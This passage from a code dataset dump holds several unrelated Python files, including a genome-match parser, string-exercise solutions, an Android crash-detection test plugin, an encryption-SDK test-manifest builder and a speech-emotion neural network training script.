self.empty_vec_sim = 0.01\r\n \r\n def cosine_similarity(self, c1, c2):\r\n c1_words = [word for word in c1.text.split() if word in self.model.vocab]\r\n if not c1_words:\r\n return self.empty_vec_sim\r\n mean_vec_c1 = np.mean(self.model[c1_words], axis=0)\r\n c2_words = [word for word in c2.text.split() if word in self.model.vocab]\r\n if not c2_words:\r\n return self.empty_vec_sim\r\n mean_vec_c2 = np.mean(self.model[c2_words], axis=0)\r\n cosine = 1.0 - scipy.spatial.distance.cosine(mean_vec_c1, mean_vec_c2)\r\n return cosine\r\n\r\n def weighted_cosine_similarity(self, c1, c2):\r\n weighted_c1 = 0\r\n weighted_c2 = 0\r\n c1_words = [word for word in c1.text.split() if word in self.model.vocab]\r\n if not c1_words:\r\n return self.empty_vec_sim\r\n c2_words = [word for word in c2.text.split() if word in self.model.vocab]\r\n if not c2_words:\r\n return self.empty_vec_sim\r\n for c1_word in c1_words:\r\n weighted_c1 = np.add(weighted_c1, self.model[c1_word] * (0.001 / (0.001 + self.model.vocab[c1_word].count)))\r\n weighted_c1 = weighted_c1 / len(c1_words)\r\n for c2_word in c2_words:\r\n weighted_c2 = np.add(weighted_c2, self.model[c2_word] * (0.001 / (0.001 + self.model.vocab[c2_word].count)))\r\n weighted_c2 = weighted_c2 / len(c2_words)\r\n cosine = 1.0 - scipy.spatial.distance.cosine(weighted_c1, weighted_c2)\r\n return abs(cosine)\r\n","sub_path":"Comment-Summarization/annotation-engine/features/semantic_feature.py","file_name":"semantic_feature.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"639670705","text":"'''\nCreated on Jan 1, 2011\n\n@author: John L. 
Herndon\n@contact: herndon@cs.colostate.edu\n@organization: Colorado State University\n@group: Computer Science Department, Asa Ben-Hur's laboratory \n'''\n\nimport utils\nimport os\nimport re\n\ndef parseCoordMatchLine( match ):\n \n match = match.replace( '\\t', ' ' )\n sections = match.split( '|', 4 )\n \n #parse the first section, containing the start and end\n #locations of the match\n firstsection = sections[ 0 ].strip( )\n firstsectiontokens = re.split( ' +', firstsection )\n start = int( firstsectiontokens[ 0 ].strip( ) )\n end = int( firstsectiontokens[ 1 ].strip( ) )\n \n #parse the last section, containing the sequenceID\n lastsection = sections[ -1 ].strip( )\n lastsectiontokens = re.split( \" +\", lastsection )\n \n seqid = lastsectiontokens[ 0 ].strip( )\n \n return utils.Match( start, end, seqid )\n \ndef parseCoordMatchFile( coordFileName ):\n '''\n A method to parse the coord file.\n returns a list of utils.match objects\n '''\n returnValue = [ ]\n \n #throw if the file doesn't exist\n if os.path.exists( coordFileName ) == False:\n raise utils.NoFileFoundException( coordFileName )\n \n \n #read the nucmer file into memory\n lines = open( coordFileName ).readlines( )\n \n #skip forward to the start of the matches. \n i = 0\n while lines[ i ] [ 0] != '=':\n i += 1\n matchLines = lines[ i+1 : ]\n \n #parse each line for match start, end and sequenceID\n for matchLine in matchLines:\n returnValue.append( parseCoordMatchLine( matchLine ) )\n \n utils.logMessage( \"NucmerParser::parseCoordMatchFile( )\", \"Parse {0}, finding {1} matches\".format( coordFileName, len( returnValue ) ) )\n\n return returnValue\n \n \n \n \n \n \n ","sub_path":"galaxy/tools/uniqprimer/uniqprimer/uniqprimer-0.5.0/build/lib/primertools/nucmerparser.py","file_name":"nucmerparser.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"71668064","text":"\"\"\"\n# 1 Enter a string of words separated by spaces. Find the longest word.\n\n\"\"\"\n\ndef long_word(string):\n counter = 0\n list1 = string.split()\n l = len(list1)\n while l > 0:\n if counter < len(list1[l-1]):\n counter = len(list1[l-1])\n l -= 1\n else:\n l -= 1\n return counter\n\nprint(long_word('Find the longest word'))\n\n\n\n\"\"\"\n# 2 Enter an irregular string (that means it may have space at the beginning of a string, \nat the end of the string, and words may be separated by several spaces). \nMake the string regular (delete all spaces at the beginning and end of the string, leave one space separating words).\n\n\"\"\"\n\ndef irreg_str(string):\n l = string.split()\n return ' '.join(l)\n\n\n\nprint(irreg_str(' Find the longest word '))\n\n\n\"\"\"\nFrom Codewars # 1\nDefine String.prototype.toAlternatingCase \n(or a similar function/method such as to_alternating_case/toAlternatingCase\n/ToAlternatingCase in your selected language; \nsee the initial solution for details) such that each lowercase letter becomes uppercase \nand each uppercase letter becomes lowercase. For example:\n\nhEllO wOrld\n\"\"\"\n\ndef to_alternating_case(string):\n result = ''\n for i in string:\n if i.islower() == True:\n result += i.upper()\n else:\n result += i.lower()\n return result\n\nprint(to_alternating_case(\"1a2b3c4d5e\"))\n\n\n\n\"\"\"\nFrom Codewars # 2\n\nIs the string uppercase?\nTask\nCreate a method is_uppercase() to see whether the string is ALL CAPS. 
For example:\n\nis_uppercase(\"c\") == False\nis_uppercase(\"C\") == True\nis_uppercase(\"hello I AM DONALD\") == False\nis_uppercase(\"HELLO I AM DONALD\") == True\nis_uppercase(\"ACSKLDFJSgSKLDFJSKLDFJ\") == False\nis_uppercase(\"ACSKLDFJSGSKLDFJSKLDFJ\") == True\nIn this Kata, a string is said to be in ALL CAPS whenever it does not contain any lowercase letter \nso any string containing no letters at all is trivially considered to be in ALL CAPS.\n\n\n\n\"\"\"\n\ndef is_uppercase(inp):\n    return inp.isupper()\n\nprint(is_uppercase('ACSKLDFJSgSKLDFJSKLDFJ'))\n\n\n\n\"\"\"\nFrom Codewars # 3\n\nGiven a string of digits, you should replace any digit below 5 with '0' \nand any digit 5 and above with '1'. Return the resulting string.\n\n\"\"\"\ndef fake_bin(x):\n    res = ''\n    l = list(x)\n    for i in l:\n        if int(i) < 5:\n            res += '0'\n        else:\n            res += '1'\n    return res\n\nprint(fake_bin(\"1234888\"))","sub_path":"Algorithm_4.py","file_name":"Algorithm_4.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"549405758","text":"import pandas as pd\r\nimport statistics\r\nimport matplotlib\r\nimport seaborn as sns\r\nfrom matplotlib import pyplot as plt\r\ndosya = pd.read_csv(\"sat.csv\")\r\n\r\n\r\n\r\nprint(dosya.info())\r\n\r\n\r\nprint((dosya['Mathematics Mean'].values)-(dosya['Critical Reading Mean'].values))\r\na = dosya['Critical Reading Mean'].mean()\r\nb = dosya['Mathematics Mean'].mean()\r\nc = dosya['Writing Mean'].mean()\r\nprint(a)\r\nprint(b)\r\nprint(c)\r\n\r\n\r\nsns.countplot(dosya['Mathematics Mean'],label=\"count of Mathematics\")\r\n\r\nplt.show()\r\nb = sns.countplot(dosya['Critical Reading Mean'],label=\"count of Reading\")\r\nplt.show()\r\nc = sns.countplot(dosya['Writing Mean'],label=\"count of Writing\")\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"\r\n# There are 460 school names but only 386 test takers.\r\n# 1. The answer is 460.\r\n# 2. The answer is 460 - 386 = 74, since there are only 386 test takers; some lines are empty.\r\n# 3. The answer is e.g. BARD HIGH SCHOOL EARLY COLLEGE, STUYVESANT HIGH SCHOOL.\r\n# 4. The answer is Lower East Side Preparatory High School; the result is 218. Some results\r\n#    were NaN because those lines are empty.\r\n\"\"\"","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"254957188","text":"\"\"\"\nTo install and enable, copy this file to $TOP/plugins/ where $TOP is the\ndirectory where runtests.py is located, then add this line to your settings\nfile:\n\nEXPERIMENTAL_CRASH_DETECT_SUPPORT=True\n\nThis plugin enables the use of the AppCrashDetector by runtests.py to\ndetect ANRs and force closes. runtests.py will start ACD before executing\na test and stop ACD after each test completes. If ANRs or force closes are\ndetected, additional logs (FCs.*.txt, ANRs.*.txt) will appear in the log\ndirectory for the test. 
This plugin assumes the AppCrashDetector code has\nalready been pushed to the device.\n\nYou may obtain a copy of AppCrashDetector from:\nhttp://mapps-test.sourceforge.mot-mobility.com/temp/AppCrashDetector.zip\n\nAppCrashDetector works on Eclair and later versions of Android.\n\"\"\"\n\nimport time\n\nimport android\n\n# XXX: Report # ANRs, FCs in summary report\n@android.register_connect_hook\ndef __crashdetect_connect_hook(a, connecting):\n    if not hasattr(a.settings, 'EXPERIMENTAL_CRASH_DETECT_SUPPORT'): return\n\n    TAG = 'crashdetect'\n\n    if connecting:\n        android.log.info(TAG, 'Connecting')\n        a.internal.crashdetect = a.internal.transport.popen('acd.sh')\n        time.sleep(1) # allow it time to start up\n        output = a.device.sh( 'AppCrashDetector.sh config -1 1;'\n                              'AppCrashDetector.sh logConsole 1')\n        if 'false' in output or 'not found' in output or 'Exception' in output:\n            android.log.error(TAG, 'Startup error')\n            a.device.sh('AppCrashDetector.sh shutdown')\n            a.internal.crashdetect.communicate()\n            del a.internal.crashdetect\n        return\n\n    # disconnecting\n    if 'crashdetect' not in dir(a.internal):\n        return\n\n    android.log.info(TAG, 'Disconnecting')\n    a.device.sh('AppCrashDetector.sh shutdown')\n    output = a.internal.crashdetect.communicate()[0]\n    IDLE, IN_ANR, IN_FC = range(3)\n    state, ANRs, FCs = IDLE, [], []\n    for o in output.splitlines():\n        if state != IDLE and len(o) == 0:\n            state = IDLE\n        elif state == IN_ANR:\n            ANRs[-1] += o + '\\n'\n        elif state == IN_FC:\n            FCs[-1] += o + '\\n'\n        else:\n            assert state == IDLE\n            if o.startswith('// CRASH'):\n                state = IN_FC\n                FCs.append(o + '\\n')\n            elif o.startswith('// NOT RESPONDING'):\n                state = IN_ANR\n                ANRs.append(o + '\\n')\n    if len(FCs) != 0:\n        android.log.warning(TAG, '%d force closes detected' % len(FCs))\n        f = open(a.log.log_filename('FCs.txt'), 'wb')\n        for FC in FCs: f.write(FC + '\\n')\n        f.close()\n    if len(ANRs) != 0:\n        android.log.warning(TAG, '%d ANRs detected' % len(ANRs))\n        f = open(a.log.log_filename('ANRs.txt'), 'wb')\n        for ANR in ANRs: f.write(ANR + '\\n')\n        f.close()\n    del a.internal.crashdetect\n","sub_path":"apython/extras/plugins/crashdetect.py","file_name":"crashdetect.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"634371855","text":"#coding=utf-8\n\nimport unittest\n\n\n\"\"\"\n\nLongest Substring Without Repeating Characters\n\nGiven a string, find the length of the longest substring without repeating characters.\nFor example, the longest substring without repeating letters for \"abcabcbb\" is \"abc\", which the length is 3.\nFor \"bbbbb\" the longest substring is \"b\", with the length of 1.\n\nHash Table Two Pointers String\nHide Similar Problems (H) Longest Substring with At Most Two Distinct Characters\n\n\n\"\"\"\n\n\nclass Solution:\n    # @param {string} s\n    # @return {integer}\n    def lengthOfLongestSubstring(self, s): # ref idea, use dict for position !!!\n        if not s:\n            return 0\n        pos = {}\n        result = 0\n        i = 0\n        for j in range(len(s)):\n            char = s[j]\n            if char not in pos or pos[char] < i:\n                pos[char] = j\n                result = max(result, j-i+1)\n            else:\n                char_pos = pos[char]\n                pos[char] = j # don't forget to update new pos of char here\n                i = char_pos + 1\n        return result\n\n    def lengthOfLongestSubstring_wrongonref(self, s): # ref idea, use dict for position !!!, wrong for case2\n        if not s:\n            return 0\n        pos = {}\n        result = 0\n        i = 0\n        for j in range(len(s)):\n            char = s[j]\n            if char not in pos:\n                pos[char] = j\n                result = max(result, j-i+1)\n            else:\n                char_pos = 
pos[char]\n i = char_pos + 1\n return result\n\n\n def lengthOfLongestSubstring4(self, s): # good self idea, 20170517\n \"\"\"\n rev keep non repeating character\n :param s: \n :return: \n \"\"\"\n if not s:\n return 0\n i, j = 0, 0\n rev = {}\n result = 0\n while j < len(s):\n char = s[j]\n if char not in rev:\n rev[char] = 1\n result = max(result, j-i+1)\n else:\n rev[char] += 1\n while s[i] != char:\n del rev[s[i]]\n i += 1\n rev[char] -= 1\n i += 1\n j += 1\n return result\n\n\n def lengthOfLongestSubstring3(self, s): # can be simpler , 20170517\n # write your code here\n if not s:\n return 0\n i, j = 0, 0\n rev = {}\n result = 0\n while j < len(s):\n char = s[j]\n if char not in rev:\n rev[char] = 1\n j += 1\n result = max(result, j-i)\n continue\n else:\n rev[char] += 1\n while True:\n tmp = s[i]\n rev[tmp] -= 1\n i += 1\n if rev[tmp] == 0:\n del rev[tmp]\n if rev[char] <= 1:\n break\n j += 1 # don't forget this , otherwise wrong\n return result\n\n def lengthOfLongestSubstring1(self, s):\n maxlen = 0\n subStr = ''\n tail = 0\n for head in xrange(len(s)):\n if s[head] not in subStr:\n subStr += s[head]\n else:\n maxlen = max(maxlen, len(subStr))\n while s[tail] != s[head]:\n tail += 1\n tail += 1\n subStr = s[tail: head+1]\n return max(maxlen, len(subStr))\n\n def lengthOfLongestSubstring2(self, s):\n maxlen = 0\n subDict = {}\n lastRepeat = -1\n for head in xrange(len(s)):\n if s[head] not in subDict:\n subDict[s[head]] = head\n else:\n if lastRepeat < subDict[s[head]]:\n maxlen = max(maxlen, head - 1 - lastRepeat)\n lastRepeat = subDict[s[head]]\n subDict[s[head]] = head\n else:\n subDict[s[head]] = head\n return max(maxlen, len(s) - 1 - lastRepeat)\n\nclass SolutionTester(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_case1(self):\n nums = \"aaaa\"\n answer = 1\n result = self.sol.lengthOfLongestSubstring(nums)\n self.assertEqual(answer, result)\n\n def test_case2(self):\n nums = \"an++--viaj\"\n answer = 5\n result = self.sol.lengthOfLongestSubstring(nums)\n self.assertEqual(answer, result)\n\n\ndef main():\n suite = unittest.TestLoader().loadTestsFromTestCase(SolutionTester)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\nif __name__ == \"__main__\":\n main()\n\n\"\"\"\n\nclass Solution(object):\n def lengthOfLongestSubstring(self, s):\n ans = 0\n # left用于记录合法的左边界位置,last用于记录字符上一次出现的位置\n left = 0\n last = {}\n for i in range(len(s)):\n # 子串中出现重复字符,变更left至上一次s[i]出现位置之后,使得子串合法\n if s[i] in last and last[s[i]] >= left:\n left = last[s[i]] + 1\n last[s[i]] = i\n ans = max(ans, i - left + 1)\n return ans\n \n\n\"\"\"\n\n# if __name__ == '__main__':\n# sol = Solution()\n# s = 'aab'\n# #s = 'eee'\n# #s = \"qwnfenpglqdq\"\n# print sol.lengthOfLongestSubstring(s)","sub_path":"freq/longest_substring_without_repeating_characters.py","file_name":"longest_substring_without_repeating_characters.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"369050269","text":"# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. 
See the License for the specific\n# language governing permissions and limitations under the License.\n#\n# Only Python 3.7+ compatibility is guaranteed.\n\nimport argparse\nimport json\nimport os\nimport sys\nfrom urllib.parse import urlunparse\n\nfrom awses_message_encryption_utils import (\n ALGORITHM_SUITES,\n ENCRYPTION_CONTEXTS,\n FRAME_SIZES,\n PLAINTEXTS,\n RAW_RSA_PADDING_ALGORITHMS,\n _keys_for_algorithm,\n _keys_for_decryptval,\n _keys_for_type,\n build_tests,\n)\n\nMANIFEST_VERSION = 2\n\n\ndef _tests_for_type(type_name, tests):\n \"\"\"Filter encrypt manifest keys by type.\n\n :param str type_name: Key type name for which to filter\n :param dict keys: Parsed keys manifest\n \"\"\"\n for _name, test in tests[\"tests\"].items():\n for master_key in test[\"master-keys\"]:\n if master_key[\"type\"] == type_name:\n yield test\n break\n\n\ndef _tests_for_algorithm(algorithm_name, tests):\n \"\"\"Filter encrypt manifest keys by algorithm name.\n\n :param str algorithm_name: Key algorithm name for which to filter\n :param dict tests: Full message encrypt manifest to test\n \"\"\"\n for _name, test in tests[\"tests\"].items():\n for master_key in test[\"master-keys\"]:\n if master_key[\"key\"].startswith(algorithm_name + \"-\"):\n yield test\n break\n\n\ndef _test_manifest(keys_filename, manifest):\n \"\"\"Test that the manifest is actually complete.\n\n :param str keys_file: Name of file containing the keys manifest\n :param dict manifest: Full message encrypt manifest to test\n \"\"\"\n with open(keys_filename, \"r\") as keys_file:\n keys = json.load(keys_file)\n\n aes_key_count = len(list(_keys_for_algorithm(\"aes\", keys)))\n black_hole_aes_key_count = len(\n [value for value in list(_keys_for_algorithm(\"aes\", keys)) if value in list(_keys_for_decryptval(False, keys))]\n )\n aes_key_combination_count = (\n aes_key_count\n - black_hole_aes_key_count\n + ((aes_key_count - black_hole_aes_key_count) * black_hole_aes_key_count)\n )\n\n cycleable_rsa_key_count = 0\n black_hole_rsa_key_count = 0\n for _name, rsa_key in _keys_for_algorithm(\"rsa\", keys):\n if rsa_key[\"encrypt\"]:\n if rsa_key[\"decrypt\"]:\n cycleable_rsa_key_count += 1\n else:\n black_hole_rsa_key_count += 1\n\n cycleable_rsa_combination_count = cycleable_rsa_key_count * len(RAW_RSA_PADDING_ALGORITHMS)\n black_hole_rsa_combination_count = cycleable_rsa_combination_count * black_hole_rsa_key_count\n rsa_key_combination_count = cycleable_rsa_combination_count + black_hole_rsa_combination_count\n\n kms_key_count = len(list(_keys_for_type(\"aws-kms\", keys)))\n black_hole_kms_key_count = len(\n [value for value in list(_keys_for_type(\"aws-kms\", keys)) if value in list(_keys_for_decryptval(False, keys))]\n )\n kms_key_combination_count = (\n kms_key_count\n - black_hole_kms_key_count\n + ((kms_key_count - black_hole_kms_key_count) * black_hole_kms_key_count)\n )\n\n aes_test_count = len(list(_tests_for_algorithm(\"aes\", manifest)))\n rsa_test_count = len(list(_tests_for_algorithm(\"rsa\", manifest)))\n kms_test_count = len(list(_tests_for_type(\"aws-kms\", manifest)))\n\n iterations = len(ALGORITHM_SUITES) * len(FRAME_SIZES) * len(ENCRYPTION_CONTEXTS)\n expected_aes_test_count = aes_key_combination_count * iterations\n expected_rsa_test_count = rsa_key_combination_count * iterations\n expected_kms_test_count = kms_key_combination_count * iterations\n\n if not all(\n [\n 0 < expected_aes_test_count == aes_test_count,\n 0 < expected_rsa_test_count == rsa_test_count,\n 0 < expected_kms_test_count == kms_test_count,\n ]\n 
):\n raise ValueError(\n \"Unexpected test count: \\nAES: {aes}\\nRSA: {rsa}\\nAWS-KMS: {kms}\".format(\n aes=\"Expected: {expected} Actual: {actual}\".format(\n expected=expected_aes_test_count, actual=aes_test_count\n ),\n rsa=\"Expected: {expected} Actual: {actual}\".format(\n expected=expected_rsa_test_count, actual=rsa_test_count\n ),\n kms=\"Expected: {expected} Actual: {actual}\".format(\n expected=expected_kms_test_count, actual=kms_test_count\n ),\n )\n )\n\n\ndef build_manifest(keys_filename):\n \"\"\"Build the test-case manifest which directs the behavior of cross-compatibility clients.\n\n :param str keys_file: Name of file containing the keys manifest\n \"\"\"\n with open(keys_filename, \"r\") as keys_file:\n keys = json.load(keys_file)\n\n keys_path = \"/\".join(keys_filename.split(os.path.sep))\n keys_uri = urlunparse((\"file\", keys_path, \"\", \"\", \"\", \"\"))\n\n return {\n \"manifest\": {\"type\": \"awses-encrypt\", \"version\": MANIFEST_VERSION},\n \"keys\": keys_uri,\n \"plaintexts\": PLAINTEXTS,\n \"tests\": dict(build_tests(keys)),\n }\n\n\ndef main(args=None):\n \"\"\"Entry point for CLI\"\"\"\n parser = argparse.ArgumentParser(description=\"Build an AWS Encryption SDK encrypt message manifest.\")\n parser.add_argument(\"--human\", action=\"store_true\", help=\"Print human-readable JSON\")\n parser.add_argument(\"--keys\", required=True, help=\"Keys manifest to use\")\n\n parsed = parser.parse_args(args)\n\n manifest = build_manifest(parsed.keys)\n\n _test_manifest(parsed.keys, manifest)\n\n kwargs = {}\n if parsed.human:\n kwargs[\"indent\"] = 4\n\n return json.dumps(manifest, **kwargs)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"features/0003-awses-message-encryption-generate.py","file_name":"0003-awses-message-encryption-generate.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"441159586","text":"'''the function within'''\ndef domath():\n '''gets input and does the equations the prints it'''\n var_a = float(input())\n var_b = float(input())\n var_c = float(input())\n var_d = float(input())\n\n\n result_1 = func_f(func_f(var_a))\n result_2 = func_g(func_f(var_a - var_b))\n result_3 = func_h(func_f(var_a+var_b), func_f(var_a+var_c), func_g(func_f(var_d**2)))\n#last one too long, had to break it up to parts\n subresult_1 = func_h(func_f(var_a + var_b), func_f(var_a-var_c), func_g(func_f(var_d**2)))\n subresult_2 = func_g(func_f(var_a-var_b))\n subresult_3 = func_f(func_f(func_f(func_f(func_f(var_c)))))\n subresult_4 = var_d**8\n#here comes the boss\n result_4 = func_i(subresult_1, subresult_2, subresult_3, subresult_4)\n#printing process\n print(result_1)\n print(result_2)\n print(result_3)\n print(result_4)\n\n\ndef func_f(varx):\n '''the function f'''\n return 2*varx\n\ndef func_g(varx):\n '''the function g'''\n return (3*varx**4) - (varx**3) + (2*varx**2) + 10\n\ndef func_h(varx, vary, varz):\n '''the function h'''\n return ((varz+varx)**2) - (varx*vary) + (vary**2)\n\ndef func_i(vara, varb, varc, vard):\n '''the function i'''\n return ((vara**2)+(varb**2)-(varc**2))/((vard**2)-(2*vara*vard)+(2*vara))\n\n\n\ndomath()\n","sub_path":"22_aug/thefuncwithin.py","file_name":"thefuncwithin.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"20440937","text":"# Features:\n# 62 features - 26 MFCCs (mean) and 26 MFCCs (standard deviation), 7 spectral 
contrast (mean), 2 poly features (mean), and 1 RMS (mean).\n#\n#*************************************************************************************\n\nimport pandas as pd\nimport math\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport librosa as rosa\nimport os\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nimport tensorflow.keras as keras\nfrom sklearn.utils import resample\nfrom tensorflow.keras.callbacks import LearningRateScheduler\n\n\n# Initialize timer\nt_1 = time.perf_counter()\n\n# Set the random seeds for replicating results over multiple runs.\nnp.random.seed(0)\ntf.random.set_seed(0)\n\n# Import dataframe/dataset into an instance/object 'df' using Pandas. Use first row as column header and first column as row header!\ndf = pd.read_csv(r'/home/r_m727/All_Files/Corpus/Simulated/RAVDESS+TESS+CREMA-D/RAVDESS+TESS+CREMA-D_Librosa_Clean.csv', header=0, index_col=0)\n\n# Rename target labels.\ndf['Emotion'].replace({\"Neutral\" : 1.0, \"Happy\" : 2.0, \"Sad\" : 3.0, \"Angry\" : 4.0, \"Fearful\" : 5.0, \"Disgust\" : 6.0, \"Surprised\" : 7.0}, inplace=True)\n\n# Take data samples of each class from dataframe into separate dataframes.\ndf_happy = df.loc[df.Emotion==2.0]\ndf_sad = df[df.Emotion==3.0]\ndf_angry = df[df.Emotion==4.0]\ndf_fearful = df[df.Emotion==5.0]\ndf_disgust = df[df.Emotion==6.0]\ndf_neutral = df[df.Emotion==1.0]\ndf_surprised = df[df.Emotion==7.0]\n\n# Join only the majority classes, leaving out Neutral and Surprised.\ndf_less = pd.concat([df_happy, df_sad, df_angry, df_fearful, df_disgust])\n\n# Extract labels of majority classes.\ny_less = df_less.iloc[0:9315, 62].values\n# Extract features of majority classes.\nX_less = df_less.iloc[0:9315, list(range(62))].values\nprint(y_less)\n\n# Split and stratify majority class samples for training and testing.\nX_train_temp_less, X_test_less, y_train_temp_less, y_test_less = train_test_split(X_less, y_less, test_size=931, random_state=0, stratify=y_less) # training split = 90%, test split = 10%\n\n# Further split and stratify majority class training samples for training data for training and validating.\nX_train_less, X_val_less, y_train_less, y_val_less = train_test_split(X_train_temp_less, y_train_temp_less, test_size=931, random_state=0, stratify=y_train_temp_less) # training split = 80%, validation split = 10%\n\n# Take minority data samples from dataframe to array\nneutral_array = df_neutral.to_numpy()\nsurprised_array = df_surprised.to_numpy()\n\n# Shuffle the data samples of minority class\nnp.random.shuffle(neutral_array)\nnp.random.shuffle(surprised_array)\n\n# Split minority class Neutral in 80:10:10 ratio.\ntrain_neutral = neutral_array[0:1267, :]\nval_neutral = neutral_array[1267:1425, :]\ntest_neutral = neutral_array[1425:1583, :]\n\n# Resample Neutral data to match majority class samples.\ntrain_neutral_resampled = resample(train_neutral, n_samples=1491, replace=True, random_state=0)\nval_neutral_resampled = resample(val_neutral, n_samples=186, replace=True, random_state=0)\ntest_neutral_resampled = resample(test_neutral, n_samples=186, replace=True, random_state=0)\n\n# Separate features and target labels for Neutral data.\nX_train_neutral = train_neutral_resampled[:, 0:62]\nX_val_neutral = val_neutral_resampled[:, 0:62]\nX_test_neutral = test_neutral_resampled[:, 0:62]\ny_train_neutral = train_neutral_resampled[:, 62]\ny_val_neutral = val_neutral_resampled[:, 62]\ny_test_neutral = test_neutral_resampled[:, 62]\n\n# Split minority class Surprised in 
80:10:10 ratio.\ntrain_surprised = surprised_array[0:474, :]\nval_surprised = surprised_array[474:533, :]\ntest_surprised = surprised_array[533:592, :]\n\n# Resample Surprised data to match majority class samples.\ntrain_surprised_resampled = resample(train_surprised, n_samples=1491, replace=True, random_state=0)\nval_surprised_resampled = resample(val_surprised, n_samples=186, replace=True, random_state=0)\ntest_surprised_resampled = resample(test_surprised, n_samples=186, replace=True, random_state=0)\n\n# Separate features and target labels for Surprised data.\nX_train_surprised = train_surprised_resampled[:, 0:62]\nX_val_surprised = val_surprised_resampled[:, 0:62]\nX_test_surprised = test_surprised_resampled[:, 0:62]\ny_train_surprised = train_surprised_resampled[:, 62]\ny_val_surprised = val_surprised_resampled[:, 62]\ny_test_surprised = test_surprised_resampled[:, 62]\n\n# Join upsampled minority data samples with majority data samples.\nX_train_almost = np.concatenate((X_train_less, X_train_neutral), axis=0)\nX_train = np.concatenate((X_train_almost, X_train_surprised), axis=0)\nX_val_almost = np.concatenate((X_val_less, X_val_neutral), axis=0)\nX_val = np.concatenate((X_val_almost, X_val_surprised), axis=0)\nX_test_almost = np.concatenate((X_test_less, X_test_neutral), axis=0)\nX_test = np.concatenate((X_test_almost, X_test_surprised), axis=0)\ny_train_almost = np.concatenate((y_train_less, y_train_neutral), axis=0)\ny_train = np.concatenate((y_train_almost, y_train_surprised), axis=0)\ny_val_almost = np.concatenate((y_val_less, y_val_neutral), axis=0)\ny_val = np.concatenate((y_val_almost, y_val_surprised), axis=0)\ny_test_almost = np.concatenate((y_test_less, y_test_neutral), axis=0)\ny_test = np.concatenate((y_test_almost, y_test_surprised), axis=0)\n\n\nmean_vals = np.mean(X_train, axis=0)\nstd_val = np.std(X_train, axis=0)\n\n# Standardize the inputs\nX_train_centered = (X_train - mean_vals)/std_val\nX_val_centered = (X_val - mean_vals)/std_val\nX_test_centered = (X_test - mean_vals)/std_val\n\ndel X_train, X_val, X_test, X_train_temp_less, y_train_temp_less\n\nprint(X_train_centered.shape, y_train.shape)\nprint(X_val_centered.shape, y_val.shape)\nprint(X_test_centered.shape, y_test.shape)\n\n\n\n# One-Hot Encode the classes\ny_train_onehot = keras.utils.to_categorical(y_train)\ny_val_onehot = keras.utils.to_categorical(y_val)\ny_test_onehot = keras.utils.to_categorical(y_test)\n\n# Create an object/instance 'model' for the 'Sequential()' class.\nmodel = keras.models.Sequential()\nmodel.add(\n\tkeras.layers.Dense( units=105,\n\t\t\t\tinput_dim=X_train_centered.shape[1],\n\t\t\t\tkernel_initializer='glorot_uniform',\n\t\t\t\tbias_initializer='zeros', \n\t\t\t\tactivation='relu'))\n\nmodel.add(\n keras.layers.Dropout(0.30))\n\nmodel.add(\n\tkeras.layers.Dense( units=62,\n\t\t\t\tinput_dim=105,\n\t\t\t\tkernel_initializer='glorot_uniform',\n\t\t\t\tbias_initializer='zeros', \n\t\t\t\tactivation='relu'))\n\nmodel.add(\n keras.layers.Dropout(0.10))\n\nmodel.add(\n\tkeras.layers.Dense( units=y_train_onehot.shape[1],\n\t\t\t\tinput_dim=62,\n\t\t\t\tkernel_initializer='glorot_uniform',\n\t\t\t\tbias_initializer='zeros',\n\t\t\t\tactivation='softmax'))\n\n# Define the learning rate schedule. 
This can then be passed as the learning rate for the optimizer.\nlrate = keras.optimizers.schedules.InverseTimeDecay(initial_learning_rate=0.01, decay_steps=1000, decay_rate=0.8)\n\nadam_optimizer = keras.optimizers.Adam(\n\t\t\t\t\tlearning_rate=lrate) #1e-06 gave better result than default value 1e-07\n\nmodel.compile(optimizer=adam_optimizer,\n\t\t\t\t\tloss='categorical_crossentropy', metrics=[keras.metrics.CategoricalAccuracy(), keras.metrics.Precision(), keras.metrics.Recall()])\n\t\t\t\t\t\t \n\t\t\t\t\t\t\t# cross-entropy: fancy name for logistic regression \n\n# Train the MLP\nhistory = model.fit(X_train_centered, y_train_onehot, batch_size=16, epochs=50, verbose=2, validation_data=(X_val_centered, y_val_onehot))\n\nprint(history.history)\n\n# Evaluate the model on the test data using `evaluate`\nresults = model.evaluate(X_test_centered, y_test_onehot, batch_size=16)\nprint(\"test loss, test acc:\", results)\n\n\n# Plot the training and validation accuracies vs. epochs for the latest loop iteration\nfig = plt.figure()\nplt.plot(history.history['categorical_accuracy'])\nplt.plot(history.history['val_categorical_accuracy'])\nplt.title('MLP_Custom_Complete_Clean')\nplt.grid()\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 